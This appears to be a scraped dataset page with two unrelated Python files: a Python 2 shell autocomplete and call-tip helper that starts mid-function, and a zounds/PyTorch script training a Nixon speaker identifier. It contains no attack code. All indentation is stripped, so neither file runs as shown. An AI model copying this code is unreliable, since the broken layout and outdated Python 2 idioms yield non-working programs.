dict = {}
if not hasattrAlwaysReturnsTrue(object):
# Add some attributes that don't always get picked up.
special_attrs = ['__bases__', '__class__', '__dict__', '__name__',
'func_closure', 'func_code', 'func_defaults',
'func_dict', 'func_doc', 'func_globals', 'func_name']
attributes += [attr for attr in special_attrs \
if hasattr(object, attr)]
if includeMagic:
try: attributes += object._getAttributeNames()
except: pass
# Special code to allow traits to be caught by autocomplete
if hasattr(object,'trait_get'):
try:
for i in object.trait_get().keys():
if i not in attributes:
if hasattr(object, i):
attributes += i
except:
pass
# Get all attribute names.
str_type = str(type(object))
if str_type == "<type 'array'>":
attributes += dir(object)
else:
attrdict = getAllAttributeNames(object)
# Store the object's dir.
object_dir = dir(object)
for (obj_type_name, technique, count), attrlist in attrdict.items():
# This complexity is necessary to avoid accessing all the
# attributes of the object. This is very handy for objects
# whose attributes are lazily evaluated.
if type(object).__name__ == obj_type_name and technique == 'dir':
attributes += attrlist
else:
attributes += [attr for attr in attrlist \
if attr not in object_dir and hasattr(object, attr)]
# Remove duplicates from the attribute list.
for item in attributes:
dict[item] = None
attributes = dict.keys()
# new-style swig wrappings can result in non-string attributes
# e.g. ITK http://www.itk.org/
attributes = [attribute for attribute in attributes \
if type(attribute) == str]
attributes.sort(lambda x, y: cmp(x.upper(), y.upper()))
if not includeSingle:
attributes = filter(lambda item: item[0]!='_' \
or item[1:2]=='_', attributes)
if not includeDouble:
attributes = filter(lambda item: item[:2]!='__', attributes)
return attributes
def hasattrAlwaysReturnsTrue(object):
return hasattr(object, 'bogu5_123_aTTri8ute')
def getAllAttributeNames(object):
"""Return dict of all attributes, including inherited, for an object.
Recursively walk through a class and all base classes.
"""
attrdict = {} # (object, technique, count): [list of attributes]
# !!!
# Do Not use hasattr() as a test anywhere in this function,
# because it is unreliable with remote objects: xmlrpc, soap, etc.
# They always return true for hasattr().
# !!!
try:
# This could(?) fail if the type is poorly defined without
# even a name.
key = type(object).__name__
except:
key = 'anonymous'
# Wake up sleepy objects - a hack for ZODB objects in "ghost" state.
wakeupcall = dir(object)
del wakeupcall
# Get attributes available through the normal convention.
attributes = dir(object)
attrdict[(key, 'dir', len(attributes))] = attributes
# Get attributes from the object's dictionary, if it has one.
try:
attributes = object.__dict__.keys()
attributes.sort()
except: # Must catch all because object might have __getattr__.
pass
else:
attrdict[(key, '__dict__', len(attributes))] = attributes
# For a class instance, get the attributes for the class.
try:
klass = object.__class__
except: # Must catch all because object might have __getattr__.
pass
else:
if klass is object:
# Break a circular reference. This happens with extension
# classes.
pass
else:
attrdict.update(getAllAttributeNames(klass))
# Also get attributes from any and all parent classes.
try:
bases = object.__bases__
except: # Must catch all because object might have __getattr__.
pass
else:
if isinstance(bases, types.TupleType):
for base in bases:
if type(base) is types.TypeType:
# Break a circular reference. Happens in Python 2.2.
pass
else:
attrdict.update(getAllAttributeNames(base))
return attrdict
def getCallTip(command='', locals=None):
"""For a command, return a tuple of object name, argspec, tip text.
The call tip information will be based on the locals namespace."""
calltip = ('', '', '') # object name, argspec, tip text.
# Get the proper chunk of code from the command.
root = getRoot(command, terminator='(')
try:
if locals is not None:
object = eval(root, locals)
else:
object = eval(root)
except:
return calltip
name = ''
object, dropSelf = getBaseObject(object)
try:
name = object.__name__
except AttributeError:
pass
tip1 = ''
argspec = ''
if inspect.isbuiltin(object):
# Builtin functions don't have an argspec that we can get.
pass
elif inspect.isfunction(object):
# tip1 is a string like: "getCallTip(command='', locals=None)"
argspec = apply(inspect.formatargspec, inspect.getargspec(object))
if dropSelf:
# The first parameter to a method is a reference to an
# instance, usually coded as "self", and is usually passed
# automatically by Python; therefore we want to drop it.
temp = argspec.split(',')
if len(temp) == 1: # No other arguments.
argspec = '()'
elif temp[0][:2] == '(*': # first param is like *args, not self
pass
else: # Drop the first argument.
argspec = '(' + ','.join(temp[1:]).lstrip()
tip1 = name + argspec
doc = ''
if callable(object):
try:
doc = inspect.getdoc(object)
except:
pass
if doc:
# tip2 is the first separated line of the docstring, like:
# "Return call tip text for a command."
# tip3 is the rest of the docstring, like:
# "The call tip information will be based on ... <snip>
firstline = doc.split('\n')[0].lstrip()
if tip1 == firstline or firstline[:len(name)+1] == name+'(':
tip1 = ''
else:
tip1 += '\n\n'
docpieces = doc.split('\n\n')
tip2 = docpieces[0]
tip3 = '\n\n'.join(docpieces[1:])
tip = '%s%s\n\n%s' % (tip1, tip2, tip3)
else:
tip = tip1
calltip = (name, argspec[1:-1], tip.strip())
return calltip
def getRoot(command, terminator=None):
"""Return the rightmost root portion of an arbitrary Python command.
Return only the root portion that can be eval()'d without side
effects. The command would normally terminate with a '(' or
'.'. The terminator and anything after the terminator will be
dropped."""
command = command.split('\n')[-1]
if command.startswith(sys.ps2):
command = command[len(sys.ps2):]
command = command.lstrip()
command = rtrimTerminus(command, terminator)
tokens = getTokens(command)
if not tokens:
return ''
if tokens[-1][0] is tokenize.ENDMARKER:
# Remove the end marker.
del tokens[-1]
if not tokens:
return ''
if terminator == '.' and \
(tokens[-1][1] <> '.' or tokens[-1][0] is not tokenize.OP):
# Trap decimals in numbers, versus the dot operator.
return ''
else:
# Strip off the terminator.
if terminator and command.endswith(terminator):
size = 0 - len(terminator)
command = command[:size]
command = command.rstrip()
tokens = getTokens(command)
tokens.reverse()
line = ''
start = None
prefix = ''
laststring = '.'
emptyTypes = ('[]', '()', '{}')
for token in tokens:
tokentype = token[0]
tokenstring = token[1]
line = token[4]
if tokentype is tokenize.ENDMARKER:
continue
if tokentype in (tokenize.NAME, tokenize.STRING, tokenize.NUMBER) \
and laststring != '.':
# We've reached something that's not part of the root.
if prefix and line[token[3][1]] != ' ':
# If it doesn't have a space after it, remove the prefix.
prefix = ''
break
if tokentype in (tokenize.NAME, tokenize.STRING, tokenize.NUMBER) \
or (tokentype is tokenize.OP and tokenstring == '.'):
if prefix:
# The prefix isn't valid because it comes after a dot.
prefix = ''
break
else:
# start represents the last known good point in the line.
start = token[2][1]
elif len(tokenstring) == 1 and tokenstring in ('[({])}'):
# Remember, we're working backwords.
# So prefix += tokenstring would be wrong.
if prefix in emptyTypes and tokenstring in ('[({'):
# We've already got an empty type identified so now we
# are in a nested situation and we can break out with
# what we've got.
break
else:
prefix = tokenstring + prefix
else:
# We've reached something that's not part of the root.
break
laststring = tokenstring
if start is None:
start = len(line)
root = line[start:]
if prefix in emptyTypes:
# Empty types are safe to be eval()'d and introspected.
root = prefix + root
return root
def getTokens(command):
"""Return list of token tuples for command."""
# In case the command is unicode try encoding it
if type(command) == unicode:
try:
command = command.encode(wx.GetDefaultPyEncoding())
except UnicodeEncodeError:
pass # otherwise leave it alone
f = cStringIO.StringIO(command)
# tokens is a list of token tuples, each looking like:
# (type, string, (srow, scol), (erow, ecol), line)
tokens = []
# Can't use list comprehension:
# tokens = [token for token in tokenize.generate_tokens(f.readline)]
# because of need to append as much as possible before TokenError.
try:
## This code wasn't backward compatible with Python 2.1.3.
##
## for token in tokenize.generate_tokens(f.readline):
## tokens.append(token)
# This works with Python 2.1.3 (with nested_scopes).
def eater(*args):
tokens.append(args)
tokenize.tokenize_loop(f.readline, eater)
except tokenize.TokenError:
# This is due to a premature EOF, which we expect since we are
# feeding in fragments of Python code.
pass
return tokens
def rtrimTerminus(command, terminator=None):
"""Return command minus anything that follows the final terminator."""
if terminator:
pieces = command.split(terminator)
if len(pieces) > 1:
command = terminator.join(pieces[:-1]) + terminator
return command
def getBaseObject(object):
"""Return base object and dropSelf indicator for an object."""
if inspect.isbuiltin(object):
# Builtin functions don't have an argspec that we can get.
dropSelf = 0
elif inspect.ismethod(object):
# Get the function from the object otherwise
# inspect.getargspec() complains that the object isn't a
# Python function.
try:
if object.im_self is None:
# This is an unbound method so we do not drop self
# from the argspec, since an instance must be passed
# as the first arg.
dropSelf = 0
else:
dropSelf = 1
object = object.im_func
except AttributeError:
dropSelf = 0
elif inspect.isclass(object):
# Get the __init__ method function for the class.
constructor = getConstructor(object)
if constructor is not None:
object = constructor
dropSelf = 1
else:
dropSelf = 0
elif callable(object):
# Get the __call__ method instead.
try:
object = object.__call__.im_func
dropSelf = 1
except AttributeError:
dropSelf = 0
else:
dropSelf = 0
return object, dropSelf
def getConstructor(object):
"""Return constructor for class object, or None if there isn't one."""
try:
return object.__init__.im_func
except AttributeError:
for base in object.__bases__:
constructor = getConstructor(base)
if constructor is not None:
return constructor
return None
| |
import featureflow as ff
import numpy as np
import zounds
from torch import nn
from torch import optim
import argparse
from multiprocessing.pool import ThreadPool, cpu_count
samplerate = zounds.SR11025()
BaseModel = zounds.stft(resample_to=samplerate, store_fft=True)
scale = zounds.GeometricScale(
start_center_hz=300,
stop_center_hz=3040,
bandwidth_ratio=0.07496,
n_bands=64)
scale.ensure_overlap_ratio(0.5)
@zounds.simple_lmdb_settings('speeches', map_size=1e10, user_supplied_id=True)
class Sound(BaseModel):
"""
An audio processing pipeline that computes a frequency domain representation
of the sound that follows a geometric scale
"""
bark = zounds.ArrayWithUnitsFeature(
zounds.BarkBands,
samplerate=samplerate,
stop_freq_hz=samplerate.nyquist,
needs=BaseModel.fft,
store=True)
long_windowed = zounds.ArrayWithUnitsFeature(
zounds.SlidingWindow,
wscheme=zounds.SampleRate(
frequency=zounds.Milliseconds(358),
duration=zounds.Milliseconds(716)),
wfunc=zounds.OggVorbisWindowingFunc(),
needs=BaseModel.resampled,
store=True)
long_fft = zounds.ArrayWithUnitsFeature(
zounds.FFT,
needs=long_windowed,
store=True)
freq_adaptive = zounds.FrequencyAdaptiveFeature(
zounds.FrequencyAdaptiveTransform,
transform=np.fft.irfft,
scale=scale,
window_func=np.hanning,
needs=long_fft,
store=False)
rasterized = zounds.ArrayWithUnitsFeature(
lambda fa: fa.rasterize(64),
needs=freq_adaptive,
store=False)
class DiscriminatorLayer(nn.Module):
def __init__(
self,
in_channels,
out_channels,
kernel_size=(2, 2),
stride=None):
super(DiscriminatorLayer, self).__init__()
if stride is None:
stride = kernel_size
self.conv = nn.Conv2d(
in_channels,
out_channels,
kernel_size=kernel_size,
stride=stride,
bias=False)
self.batch_norm = nn.BatchNorm2d(out_channels)
self.relu = nn.LeakyReLU(0.2)
self.dropout = nn.Dropout(0.5)
def forward(self, inp):
x = self.conv(inp)
x = self.batch_norm(x)
x = self.relu(x)
x = self.dropout(x)
return x
class Discriminator(nn.Module):
def __init__(self):
super(Discriminator, self).__init__()
self.main = nn.Sequential(
DiscriminatorLayer(1, 32),
DiscriminatorLayer(32, 64),
DiscriminatorLayer(64, 128),
DiscriminatorLayer(128, 256),
DiscriminatorLayer(256, 512),
nn.Conv2d(512, 1, (2, 2), (2, 2), bias=False),
nn.Sigmoid())
def forward(self, inp):
return self.main(inp.view(-1, 1, 64, 64))
def speaker_identification_pipeline(epochs):
@zounds.simple_settings
class RichardNixonIdentifier(ff.BaseModel):
docs = ff.PickleFeature(
ff.IteratorNode,
store=False)
shuffled = ff.PickleFeature(
zounds.ShuffledSamples,
nsamples=int(1e5),
multiplexed=True,
dtype=np.float32,
needs=docs,
store=False)
mu_law_source = ff.PickleFeature(
zounds.MuLawCompressed,
needs=shuffled.aspect('data'),
store=False)
scaled_source = ff.PickleFeature(
zounds.InstanceScaling,
needs=mu_law_source,
store=False)
network = ff.PickleFeature(
zounds.PyTorchNetwork,
trainer=zounds.SupervisedTrainer(
model=Discriminator(),
loss=nn.BCELoss(),
optimizer=lambda model:
optim.Adam(model.parameters(), lr=0.00005),
epochs=epochs,
batch_size=64,
holdout_percent=0.5),
needs=dict(data=scaled_source, labels=shuffled.aspect('labels')),
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(mu_law_source, scaled_source, network),
store=True)
return RichardNixonIdentifier
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--epochs',
help='how many epochs (full passes over data) should the network train',
default=100,
type=int)
parser.add_argument(
'--force',
help='retrain the network, even if its already been trained',
action='store_true',
default=False)
args = parser.parse_args()
zounds.ingest(
zounds.InternetArchive('Greatest_Speeches_of_the_20th_Century'),
Sound,
multi_threaded=True)
def generate_training_and_test_set():
snds = list(Sound)
# get all sounds where Nixon is the speaker
nixon = [snd for snd in snds if 'Nixon' in snd.meta['artist']]
# get an equal number of speeches by anyone besides Nixon
not_nixon = filter(
lambda snd: 'Nixon' not in snd.meta['artist'], snds)[:len(nixon)]
for snd in nixon:
yield dict(
data=snd.rasterized,
labels=np.ones((len(snd.rasterized), 1)))
for snd in not_nixon[:len(nixon)]:
yield dict(
data=snd.rasterized,
labels=np.zeros((len(snd.rasterized), 1)))
RichardNixonIdentifier = speaker_identification_pipeline(args.epochs)
if not RichardNixonIdentifier.exists() or args.force:
RichardNixonIdentifier.process(docs=generate_training_and_test_set())
rni = RichardNixonIdentifier()
# start up an in-browser REPL to interact with the results
app = zounds.ZoundsApp(
model=Sound,
audio_feature=Sound.ogg,
visualization_feature=Sound.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.